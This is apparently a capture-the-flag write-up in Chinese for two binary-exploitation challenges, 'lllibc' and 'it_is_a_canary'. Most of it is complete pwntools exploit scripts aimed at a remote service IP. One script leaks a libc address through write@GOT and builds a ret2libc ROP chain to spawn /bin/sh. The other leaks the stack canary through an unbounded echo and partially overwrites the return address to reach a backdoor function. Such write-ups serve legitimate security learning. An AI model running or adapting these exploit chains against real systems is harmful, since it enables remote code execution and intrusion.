lllibc

栈溢出

无 binsh 字符

直接 write ret2libc 即可

from pwn import * #引用pwntools库
from LibcSearcher import *
misaki = 1  # 1 -> 64-bit (amd64) target, 0 -> 32-bit (i386)
ming = 1    # 1 -> talk to the remote service, 0 -> run the binary locally
# Same two toggles as before, collapsed into conditional expressions.
context(log_level='debug', arch='amd64' if misaki else 'i386', os='linux')
p = remote('27.25.151.26', 43658) if ming else process("./lllibc")

def s(a):
    """Send `a` over the tube exactly as given (no newline appended)."""
    p.send(a)
def sl(a):
    """Send `a` followed by a newline."""
    p.sendline(a)
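def sa(a, b):
    """Wait until `a` has been received, then send `b`.

    Returns the bytes consumed up to and including `a` (pwntools'
    ``sendafter`` returns them), matching ``rl``; the original threw the
    value away. Callers that ignore the result are unaffected.
    """
    return p.sendafter(a, b)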
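def sla(a, b):
    """Wait until `a` has been received, then send `b` plus a newline.

    Returns the bytes consumed up to and including `a` (pwntools'
    ``sendlineafter`` returns them), matching ``rl``; the original threw
    the value away. Callers that ignore the result are unaffected.
    """
    return p.sendlineafter(a, b)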
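def r():
    """Receive whatever is currently available on the tube and return it.

    The original discarded the result of ``p.recv()``, so the helper could
    only be used to drain output; returning it matches ``rl``.
    """
    return p.recv()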
def rl(a):
    """Read from the tube until `a` appears and return everything read."""
    received = p.recvuntil(a)
    return received
def m():
    """Attach gdb to the live process (pwntools ``gdb.attach``)."""
    gdb.attach(p)

###############################################
# Two-stage ret2libc over a plain stack overflow.
# Stage 1 calls write@PLT to print the write@GOT entry, which reveals where
# libc is loaded; stage 2 returns into system("/bin/sh").  This only works
# because the gadget addresses below are fixed (0x40xxxx, i.e. the binary is
# presumably built without PIE) and nothing checks the read length.  PIE
# together with a bounds-checked read would break the chain; a stack canary
# would at least detect the overwrite before the first return.
len=0X10+0x08  # distance from buffer start to the saved return address (0x10 buffer + 0x8 saved rbp, inferred from the constant); NOTE: shadows builtin len()
ret=0x000000000040101a  # bare `ret` gadget, used in stage 2 to fix stack alignment
pop_rsi=0x0000000000401180  # pop rsi ; ret
pop_rdi=0x000000000040117e  # pop rdi ; ret
pop_rdx=0x0000000000401182  # pop rdx ; ret  -- defined but never used below
elf=ELF("./lllibc")
libc=ELF("libc6_2.35-0ubuntu3.8_amd64.so")  # must match the remote libc for the symbol offsets to be right
# write(1, &GOT['write'], rdx): rdx is never set by this chain, so the byte
# count is whatever rdx happened to hold (presumably large enough to cover
# the 8-byte entry -- not verified here).  0x4011EC is the return target
# after the leak; presumably it re-enters the vulnerable function so the
# overflow can be triggered a second time.
payload=b'a'*len+ p64(pop_rdi) +p64(1)+p64(pop_rsi) +p64(elf.got['write'])+p64(elf.plt['write']) + p64(0x4011EC)
sa(b'Libc how to win?\n',payload)
# Read up to the first 0x7f byte; the last 6 bytes are the leaked
# little-endian userland address, padded with zeros to 8 bytes for u64().
write_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(f'write_addr=',hex(write_addr))  # f-string carries no placeholder; prints "write_addr= 0x..."


# Stage 2: rebase libc from the leaked write address and resolve the targets.
libc_base = write_addr - libc.sym['write']
sys_addr = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b"/bin/sh\x00"))  # the binary itself has no "/bin/sh", so it is taken from libc
# The leading `ret` keeps rsp 16-byte aligned when system() is entered,
# which glibc's SSE code paths require (likely why it is needed here).
payload=b'a'*len+ p64(ret)+ p64(pop_rdi) +p64(bin_sh)+p64(sys_addr)
sa(b'Libc how to win?\n',payload)

p.interactive()  # hand the session over to the operator

it_is_a_canary

有 canary 和 pie 保护

canary 可以直接通过此处泄露出来

有完整后面,pie 没想到泄露偏移值的方法,但是有直接的后门函数,修改 返回地址低四位为 win 函数的地址,1/16 的概率打通

from pwn import * #引用pwntools库
from LibcSearcher import *
misaki = 1  # 1 -> 64-bit (amd64) target, 0 -> 32-bit (i386)
ming = 1    # 1 -> talk to the remote service, 0 -> run the binary locally
# Same two toggles as before, collapsed into conditional expressions.
context(log_level='debug', arch='amd64' if misaki else 'i386', os='linux')
p = remote('27.25.151.26', 38720) if ming else process("./it_is_a_canary")

def s(a):
    """Send `a` over the tube exactly as given (no newline appended)."""
    p.send(a)
def sl(a):
    """Send `a` followed by a newline."""
    p.sendline(a)
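def sa(a, b):
    """Wait until `a` has been received, then send `b`.

    Returns the bytes consumed up to and including `a` (pwntools'
    ``sendafter`` returns them), matching ``rl``; the original threw the
    value away. Callers that ignore the result are unaffected.
    """
    return p.sendafter(a, b)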
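def sla(a, b):
    """Wait until `a` has been received, then send `b` plus a newline.

    Returns the bytes consumed up to and including `a` (pwntools'
    ``sendlineafter`` returns them), matching ``rl``; the original threw
    the value away. Callers that ignore the result are unaffected.
    """
    return p.sendlineafter(a, b)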
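def r():
    """Receive whatever is currently available on the tube and return it.

    The original discarded the result of ``p.recv()``, so the helper could
    only be used to drain output; returning it matches ``rl``.
    """
    return p.recv()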
def rl(a):
    """Read from the tube until `a` appears and return everything read."""
    received = p.recvuntil(a)
    return received
def m():
    """Attach gdb to the live process (pwntools ``gdb.attach``)."""
    gdb.attach(p)
#
###############################################
# Canary leak followed by a partial return-address overwrite.
# The leak works because the buffer is echoed back without a length limit and
# the canary sits right after it: its lowest byte is 0x00, so overwriting that
# byte with 'b' lets the echo run on through the rest of the canary and the
# saved rbp (inferred from the parsing below; depends on how the binary
# prints the buffer).  A length-bounded echo, or not echoing the buffer at
# all, would stop the leak; the canary check itself is not bypassed, it is
# simply restored in the second write.
len=0X20  # NOTE: shadows builtin len(); 0x18 bytes of buffer precede the canary
payload=b'a'*(len-8)+b'b'  # 0x18 filler, then one byte over the canary's NUL terminator

sa(b'Is it a canary?\n',payload)
rl(b'ab')  # discard the echo up to and including the 'b' we placed

# What follows on the wire is: 7 remaining canary bytes, then 8 bytes of
# saved rbp (little-endian, top two bytes zero).  recv(8) therefore holds
# canary[1..7] plus rbp[0]; recvuntil(0x7f) then yields rbp[1..5].
canary1=u64(p.recv(8))
rbp=u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
canary_base=(canary1 >>56)<<56  # isolate rbp[0], which landed in the top byte
canary2=(canary1-canary_base)<<8  # drop rbp[0], shift canary[1..7] up one byte: low byte is 0x00 again
rbp=rbp<<8  # make room for rbp[0] in the lowest byte
canary1=canary1 >>56  # canary1 now holds only rbp[0]
rbp+=canary1  # full saved rbp reassembled
rbp_0x18=rbp+0x18  # computed but never used below
print(f'dac=',hex(canary1))  # f-strings below carry no placeholder; they print "label= 0x..."
print(f'canary=',hex(canary2))
print(f'rbp=',hex(rbp))
# Second overflow: same 0x18 filler, the recovered canary so the check passes,
# a dummy saved rbp (1), then only the low 16 bits of the return address.
# Under PIE the low 12 bits of a code address are fixed by page alignment,
# so one nibble of 0xa265 is a guess -- hence the 1/16 success rate noted in
# the write-up above.
payload2=b'a'*(len-8)+p64(canary2)+p64(1)+p16(0xa265)
#m()  # (commented out) attach gdb before the second send when debugging locally
sa(b'.',payload2)
#pause()
p.interactive()  # hand the session over to the operator